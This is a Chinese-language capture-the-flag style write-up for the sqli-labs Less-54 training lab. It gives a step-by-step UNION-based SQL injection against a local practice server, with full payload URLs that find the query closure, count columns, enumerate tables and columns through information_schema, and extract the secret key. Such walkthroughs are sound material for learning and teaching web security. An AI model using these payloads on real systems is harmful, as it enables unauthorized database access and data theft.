sqli-labs (less-54)

sqli-labs (less-54)

进入54关,我们看到了屏幕上回显了一段英语,我们去翻译看看他说的是什么意思


这个意思就是我们需要在10次之内拿到KEY,不然KEY就会重置,就很接近现实里的SQL注入漏洞了,一般CTF的题目也是通过这种方式来考察的

http://127.0.0.1/sql1/Less-54/?id=1

http://127.0.0.1/sql1/Less-54/?id=1'


没有错误回显,所以只能去猜闭合方式了
这里因为只有十次机会,猜解的过程我就直接省略了,如果猜解的次数超过了十次,回到sqli-labs的主页面点击Setup/reset Database for labs重置一下sqli-labs就行了

http://127.0.0.1/sql1/Less-54/?id=1'--+


所以闭合方式为’–+,并且为字符型注入

判断字段数

http://127.0.0.1/sql1/Less-54/?id=1' order by 3--+ #回显正常
http://127.0.0.1/sql1/Less-54/?id=1' order by 4--+ #回显错误


确定回显位置

http://127.0.0.1/sql1/Less-54/?id=-1' union select 1,2,3--+


查看当前库

http://127.0.0.1/sql1/Less-54/?id=-1' union select 1,2,database()--+


查看challenges库下的所有表

http://127.0.0.1/sql1/Less-54/?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')--+


查看gbaxkmlr9b表下的所有字段

ttp://127.0.0.1/sql1/Less-54/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='gbaxkmlr9b')--+


查询secret_G44O字段下的值

http://127.0.0.1/sql1/Less-54/?id=-1' union select 1,2,(select group_concat(secret_G44O) from challenges.gbaxkmlr9b)--+


将我们得到KEY提交到窗口就可以了


成功

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值